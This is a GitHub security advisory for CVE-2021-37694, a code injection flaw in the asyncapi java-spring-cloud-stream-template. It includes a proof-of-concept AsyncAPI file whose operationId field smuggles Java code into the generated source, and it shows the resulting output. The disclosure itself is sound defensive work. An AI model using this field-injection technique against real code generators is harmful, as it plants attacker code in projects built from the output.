Lucene search

GitHub Advisory DatabaseGHSA-XJ6R-2JPM-QVXP

HistoryAug 25, 2021 - 2:45 p.m.

Code injection issue for java-spring-cloud-stream-template

2021-08-2514:45:52

CWE-94

GitHub Advisory Database

github.com

code injection

java

spring

cloud stream

security issue

injection attack

asyncapi

command injection

customclass

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

EPSS

0.001

Percentile

50.5%

JSON

The following was initially reported by @jonaslagoni:

Given the following command:
ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer&lt;CustomClass&gt; someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": { 
              "type": "string"
          }
        }
      }
    }
  }
}

Which changes the following output:

...
  @Bean
  public Consumer&lt;CustomClass&gt; test() {
    // Add business logic here.
    return null;
  }
...

...
  @Bean
  public Consumer&lt;CustomClass&gt; test() { System.out.println("injected"); return someothername(); }
  public Consumer&lt;CustomClass&gt; someothername() {
    // Add business logic here.
    return null;
  }
...

Affected configurations

Vulners

Node

asyncapijava-spring-cloud-stream-templateRange≤0.6.9

VendorProductVersionCPE
asyncapijava-spring-cloud-stream-template*cpe:2.3:a:asyncapi:java-spring-cloud-stream-template:*:*:*:*:*:*:*:*

Vendor	Product	Version	CPE
asyncapi	java-spring-cloud-stream-template	*	cpe:2.3:a:asyncapi:java-spring-cloud-stream-template::::::::

References

github.com/advisories/GHSA-xj6r-2jpm-qvxp

github.com/asyncapi/java-spring-cloud-stream-template/security/advisories/GHSA-xj6r-2jpm-qvxp

nvd.nist.gov/vuln/detail/CVE-2021-37694

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.7

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

EPSS

0.001

Percentile

50.5%

JSON

Related for GHSA-XJ6R-2JPM-QVXP